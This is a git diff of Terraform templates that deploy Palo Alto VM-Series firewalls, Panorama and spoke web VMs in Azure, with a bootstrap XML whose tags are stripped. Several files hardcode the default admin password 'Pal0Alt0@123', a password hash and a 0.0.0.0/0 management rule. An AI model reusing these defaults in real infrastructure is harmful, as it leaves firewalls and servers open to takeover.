+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ allocation_method = "Static"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/resource-group.tf b/azure/panorama_new_rg/resource-group.tf
new file mode 100644
index 00000000..bb71e2a6
--- /dev/null
+++ b/azure/panorama_new_rg/resource-group.tf
@@ -0,0 +1,10 @@
+//# ********** RESOURCE GROUP **********
+//# Configure the Providers
+provider "azurerm" {}
+provider "random" {}
+
+//# Create a resource group
+resource "azurerm_resource_group" "resourcegroup" {
+ name = "${var.virtualMachineRG}"
+ location = "${var.Location}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/route-tables.tf b/azure/panorama_new_rg/route-tables.tf
new file mode 100644
index 00000000..5d33ffa5
--- /dev/null
+++ b/azure/panorama_new_rg/route-tables.tf
@@ -0,0 +1,17 @@
+#### CREATE THE ROUTE TABLES ####
+
+resource "azurerm_route_table" "panorama" {
+ name = "panorama"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ route {
+ name = "internet"
+ address_prefix = "0.0.0.0/0"
+ next_hop_type = "internet"
+ }
+}
+
+resource "azurerm_subnet_route_table_association" "panorama" {
+ subnet_id = "${azurerm_subnet.panorama.id}"
+ route_table_id = "${azurerm_route_table.panorama.id}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/storage-account.tf b/azure/panorama_new_rg/storage-account.tf
new file mode 100644
index 00000000..a3034ff1
--- /dev/null
+++ b/azure/panorama_new_rg/storage-account.tf
@@ -0,0 +1,11 @@
+# Storage account for boot diagnostics
+resource "random_id" "storage_account" {
+ byte_length = 4
+}
+resource "azurerm_storage_account" "mystorageaccount" {
+ name = "${var.diagnosticsStorageAccountName}${lower(random_id.storage_account.hex)}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ account_tier = "${var.diagnosticsStorageAccountTier}"
+ account_replication_type = "${var.diagnosticsStorageAccountReplication}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/terraform.tfvars.sample b/azure/panorama_new_rg/terraform.tfvars.sample
new file mode 100644
index 00000000..7ce8eb6e
--- /dev/null
+++ b/azure/panorama_new_rg/terraform.tfvars.sample
@@ -0,0 +1,33 @@
+virtualMachineRG = ""
+
+Location = ""
+
+virtualNetworkName = ""
+
+addressPrefix = ""
+
+subnetName = ""
+
+subnet = ""
+
+publicIpAddressName = ""
+
+networkInterfaceName = ""
+
+networkSecurityGroupName = ""
+
+diagnosticsStorageAccountName = ""
+
+diagnosticsStorageAccountTier = ""
+
+diagnosticsStorageAccountReplication = ""
+
+virtualMachineName = ""
+
+virtualMachineSize = ""
+
+panoramaVersion = ""
+
+adminUsername = ""
+
+adminPassword = ""
\ No newline at end of file
diff --git a/azure/panorama_new_rg/variables.tf b/azure/panorama_new_rg/variables.tf
new file mode 100644
index 00000000..9456111b
--- /dev/null
+++ b/azure/panorama_new_rg/variables.tf
@@ -0,0 +1,68 @@
+variable "virtualMachineRG" {
+ description = "Virtual Machine RG"
+ default = "pglynn-test"
+}
+variable "Location" {
+ description = "Location"
+ default = "centralus"
+}
+variable "virtualNetworkName" {
+ description = "Virtual Network Name"
+ default = "panorama"
+}
+variable "addressPrefix" {
+ description = "Address Prefix"
+ default = "10.0.0.0/24"
+}
+variable "subnetName" {
+ description = "Subnet Name"
+ default = "panorama"
+}
+variable "subnet" {
+ description = "Subnet"
+ default = "10.0.0.0/24"
+}
+variable "publicIpAddressName" {
+ description = "Public Ip Address Name"
+ default = "panorama"
+}
+variable "networkInterfaceName" {
+ description = "Network Interface Name"
+ default = "panorama"
+}
+variable "networkSecurityGroupName" {
+ description = "Network Security Group Name"
+ default = "panorama"
+}
+variable "diagnosticsStorageAccountName" {
+ description = "Diagnostics Storage Account Name"
+ default = "panorama"
+}
+variable "diagnosticsStorageAccountTier" {
+ description = "Diagnostics Storage Account Tier"
+ default = "Standard"
+}
+variable "diagnosticsStorageAccountReplication" {
+ description = "Diagnostics Storage Account Replication"
+ default = "LRS"
+}
+variable "virtualMachineName" {
+ description = "Virtual Machine Name"
+ default = "panorama"
+}
+variable "virtualMachineSize" {
+ description = "Virtual Machine Size"
+ default = "Standard_D3"
+}
+variable "panoramaVersion" {
+ description = "Panorama Version"
+ default = "8.1.2"
+}
+variable "adminUsername" {
+ description = "Admin Username"
+ default = "panadmin"
+}
+variable "adminPassword" {
+ description = "Admin Password"
+ default = "Pal0Alt0@123"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/vnet-subnets.tf b/azure/panorama_new_rg/vnet-subnets.tf
new file mode 100644
index 00000000..fba7b3cf
--- /dev/null
+++ b/azure/panorama_new_rg/vnet-subnets.tf
@@ -0,0 +1,18 @@
+# ********** VNET **********
+
+# Create a virtual network
+resource "azurerm_virtual_network" "vnet" {
+ name = "${var.virtualNetworkName}"
+ address_space = ["${var.addressPrefix}"]
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+}
+
+# Create the subnet
+
+resource "azurerm_subnet" "panorama" {
+ name = "${var.subnetName}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+ address_prefix = "${var.subnet}"
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/GUIDE.pdf b/azure/transit_2fw_2spoke_common/GUIDE.pdf
new file mode 100644
index 00000000..c66ebfe6
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/GUIDE.pdf differ
diff --git a/azure/transit_2fw_2spoke_common/README.md b/azure/transit_2fw_2spoke_common/README.md
new file mode 100644
index 00000000..4c19611a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/README.md
@@ -0,0 +1,60 @@
+# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VNETs
+
+Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+
+
+
+
+
+
+## Prerequistes
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following **BASH ONLY!**.
+```
+# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2)
+$ az vm image terms accept --urn paloaltonetworks:vmseries1::9.0.1
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1.
+
+```
+$ vi terraform.tfvars
+```
+
+
+Your terraform.tfvars should look like this before proceeding
+
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml
new file mode 100644
index 00000000..47185aa0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml
@@ -0,0 +1,1058 @@
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+ fw1
+
+
+
+ yes
+
+
+ FQDN
+
+ fw1
+ paloalto
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+
+ yes
+
+
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ no
+ yes
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+
+
+
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 168.63.129.16/32
+
+
+
+
+
+
+ untrust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ no
+
+
+
+
+ ethernet1/1
+
+
+ no
+
+
+
+
+
+ ethernet1/2
+ ethernet1/1
+ vlan
+ loopback
+ tunnel
+
+
+
+ untrust-vr
+ trust-vr
+
+
+
+
+
+
+
+
+
+
+ 22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+ universal
+
+ trust
+
+
+ trust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ spoke1-vnet
+ spoke2-vnet
+
+ no
+
+ ping
+ ssh
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+ universal
+
+ trust
+
+
+ untrust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ any
+
+ no
+
+ apt-get
+ ntp
+ ping
+ ssl
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+ no
+ This NAT policy prevents the public load balancer's health probes from being NATed.
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ service-http
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke1-intlb
+ 80
+
+ NATs inbound request to internal LB in spoke1
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ tcp-22
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke2-vm
+ 22
+
+ NATs inbound request to jump server in Spoke 1.
+
+
+ ipv4
+
+ trust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+
+
+
+ ethernet1/1
+
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 168.63.129.16/32
+
+ azure-resource
+
+
+
+ 10.1.0.4
+
+ azure-resource
+
+
+
+ 10.2.0.4
+
+ azure-resource
+
+
+
+ 10.1.0.0/16
+
+ azure-resource
+
+
+
+ 10.2.0.0/16
+
+ azure-resource
+
+
+
+ 10.1.0.100
+
+ azure-resource
+
+
+
+
+
+
+
+
+
+
+
+
+ color20
+
+
+ color13
+
+
+ color24
+
+
+ color22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ *
+
+
+ yes
+
+
+
+
+ $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1
+
+
+ yes
+
+
+
+
+
+ yes
+ 8
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
similarity index 80%
rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt
rename to azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
index 840154aa..44878949 100644
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt
@@ -4,6 +4,6 @@ default-gateway=
netmask=
ipv6-address=
ipv6-default-gateway=
-hostname=vm-series
+dhcp-accept-server-hostname=yes
dns-primary=8.8.8.8
dns-secondary=4.2.2.2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes
new file mode 100644
index 00000000..e69de29b
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/fw_common.tf b/azure/transit_2fw_2spoke_common/fw_common.tf
new file mode 100644
index 00000000..2f261ad5
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/fw_common.tf
@@ -0,0 +1,121 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create resource group for FWs, FW NICs, and FW LBs
+
+resource "azurerm_resource_group" "common_fw" {
+ name = "${var.global_prefix}${var.fw_prefix}-rg"
+ location = var.location
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create storage account and file share for bootstrapping
+
+resource "random_string" "main" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_account" "main" {
+ name = random_string.main.result
+ account_tier = "Standard"
+ account_replication_type = "LRS"
+ location = azurerm_resource_group.common_fw.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+module "common_fileshare" {
+ source = "./modules/azure_bootstrap/"
+ name = "${var.fw_prefix}-bootstrap"
+ quota = 1
+ storage_account_name = azurerm_storage_account.main.name
+ storage_account_key = azurerm_storage_account.main.primary_access_key
+ local_file_path = "bootstrap_files/"
+}
+
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series. For every fw_name entered, an additional VM-Series instance will be deployed.
+
+module "common_fw" {
+ source = "./modules/vmseries/"
+ name = "${var.fw_prefix}-vm"
+ vm_count = var.fw_count
+ username = var.fw_username
+ password = var.fw_password
+ panos = var.fw_panos
+ license = var.fw_license
+ nsg_prefix = var.fw_nsg_prefix
+ avset_name = "${var.fw_prefix}-avset"
+ subnet_mgmt = module.vnet.vnet_subnets[0]
+ subnet_untrust = module.vnet.vnet_subnets[1]
+ subnet_trust = module.vnet.vnet_subnets[2]
+ nic0_public_ip = true
+ nic1_public_ip = true
+ nic2_public_ip = false
+ nic1_backend_pool_ids = [module.common_extlb.backend_pool_id]
+ nic2_backend_pool_ids = [module.common_intlb.backend_pool_id]
+ bootstrap_storage_account = azurerm_storage_account.main.name
+ bootstrap_access_key = azurerm_storage_account.main.primary_access_key
+ bootstrap_file_share = module.common_fileshare.file_share_name
+ bootstrap_share_directory = "None"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+
+ dependencies = [
+ module.common_fileshare.completion
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool.
+
+module "common_extlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-public-lb"
+ type = "public"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [80, 22, 443]
+ backend_ports = [80, 22, 443]
+ protocol = "Tcp"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool
+
+module "common_intlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-internal-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [0]
+ backend_ports = [0]
+ protocol = "All"
+ subnet_id = module.vnet.vnet_subnets[2]
+ private_ip_address = var.fw_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Outputs to terminal
+
+output EXT-LB {
+ value = "http://${module.common_extlb.public_ip[0]}"
+}
+
+output MGMT-FW1 {
+ value = "https://${module.common_fw.nic0_public_ip[0]}"
+}
+
+output MGMT-FW2 {
+ value = "https://${module.common_fw.nic0_public_ip[1]}"
+}
+
+output SSH-TO-SPOKE2 {
+ value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}"
+}
diff --git a/azure/transit_2fw_2spoke_common/fw_vnet.tf b/azure/transit_2fw_2spoke_common/fw_vnet.tf
new file mode 100644
index 00000000..826b7152
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/fw_vnet.tf
@@ -0,0 +1,16 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create Transit VNET
+resource "azurerm_resource_group" "transit" {
+ name = "${var.global_prefix}${var.transit_prefix}-rg"
+ location = var.location
+}
+
+module "vnet" {
+ source = "./modules/vnet/"
+ name = "${var.transit_prefix}-vnet"
+ address_space = var.transit_vnet_cidr
+ subnet_names = var.transit_subnet_names
+ subnet_prefixes = var.transit_subnet_cidrs
+ location = var.location
+ resource_group_name = azurerm_resource_group.transit.name
+}
diff --git a/azure/transit_2fw_2spoke_common/images/diagram.png b/azure/transit_2fw_2spoke_common/images/diagram.png
new file mode 100644
index 00000000..45f1d146
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/diagram.png differ
diff --git a/azure/transit_2fw_2spoke_common/images/tfvars.png b/azure/transit_2fw_2spoke_common/images/tfvars.png
new file mode 100644
index 00000000..afd57343
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/tfvars.png differ
diff --git a/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf
new file mode 100644
index 00000000..1a5c1f7a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf
@@ -0,0 +1,40 @@
+
+
+resource "random_string" "randomstring" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_share" "main" {
+ name = "${var.name}${random_string.randomstring.result}"
+ storage_account_name = var.storage_account_name
+ quota = var.quota
+}
+
+resource "null_resource" "upload" {
+provisioner "local-exec" {
+ command = <
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl
new file mode 100644
index 00000000..1d02e945
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl
@@ -0,0 +1,10 @@
+#cloud-config
+
+runcmd:
+ - sudo apt-get update -y
+ - sudo apt-get install -y php
+ - sudo apt-get install -y apache2
+ - sudo apt-get install -y libapache2-mod-php
+ - sudo rm -f /var/www/html/index.html
+ - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
+ - sudo systemctl restart apache2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/spokes.tf b/azure/transit_2fw_2spoke_common/spokes.tf
new file mode 100644
index 00000000..ea6ab06c
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/spokes.tf
@@ -0,0 +1,97 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs
+
+resource "azurerm_resource_group" "spoke1_rg" {
+ name = "${var.global_prefix}${var.spoke1_prefix}-rg"
+ location = var.location
+}
+
+module "spoke1_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke1_prefix}-vnet"
+ address_space = var.spoke1_vnet_cidr
+ subnet_prefixes = var.spoke1_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+data "template_file" "web_startup" {
+ template = "${file("${path.module}/scripts/web_startup.yml.tpl")}"
+}
+
+module "spoke1_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke1_prefix}-vm"
+ vm_count = var.spoke1_vm_count
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ backend_pool_ids = [module.spoke1_lb.backend_pool_id]
+ custom_data = base64encode(data.template_file.web_startup.rendered)
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+module "spoke1_lb" {
+ source = "./modules/lb/"
+ name = "${var.spoke1_prefix}-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [80]
+ frontend_ports = [80]
+ backend_ports = [80]
+ protocol = "Tcp"
+ enable_floating_ip = false
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ private_ip_address = var.spoke1_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke2 resource group, spoke2 VNET, spoke2 VM
+
+resource "azurerm_resource_group" "spoke2_rg" {
+ name = "${var.global_prefix}${var.spoke2_prefix}-rg"
+ location = var.location
+}
+
+module "spoke2_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke2_prefix}-vnet"
+ address_space = var.spoke2_vnet_cidr
+ subnet_prefixes = var.spoke2_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
+
+module "spoke2_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke2_prefix}-vm"
+ vm_count = var.spoke2_vm_count
+ subnet_id = module.spoke2_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/terraform.tfvars b/azure/transit_2fw_2spoke_common/terraform.tfvars
new file mode 100644
index 00000000..2f122c28
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/terraform.tfvars
@@ -0,0 +1,43 @@
+#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode
+#fw_license = "bundle1"
+#fw_license = "bundle2"
+
+global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription
+location = "eastus"
+
+# -----------------------------------------------------------------------
+# VM-Series resource group variables
+
+fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group
+fw_count = 2
+fw_panos = "9.0.1"
+fw_nsg_prefix = "0.0.0.0/0"
+fw_username = "paloalto"
+fw_password = "Pal0Alt0@123"
+fw_internal_lb_ip = "10.0.2.100"
+
+# -----------------------------------------------------------------------
+# Transit resource group variables
+
+transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group
+transit_vnet_cidr = "10.0.0.0/16"
+transit_subnet_names = ["mgmt", "untrust", "trust"]
+transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24"]
+
+# -----------------------------------------------------------------------
+# Spoke resource group variables
+
+spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group
+spoke1_vm_count = 2
+spoke1_vnet_cidr = "10.1.0.0/16"
+spoke1_subnet_cidrs = ["10.1.0.0/24"]
+spoke1_internal_lb_ip = "10.1.0.100"
+
+spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group
+spoke2_vm_count = 1
+spoke2_vnet_cidr = "10.2.0.0/16"
+spoke2_subnet_cidrs = ["10.2.0.0/24"]
+
+spoke_username = "paloalto"
+spoke_password = "Pal0Alt0@123"
+spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"]
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/variables.tf b/azure/transit_2fw_2spoke_common/variables.tf
new file mode 100644
index 00000000..4899c169
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/variables.tf
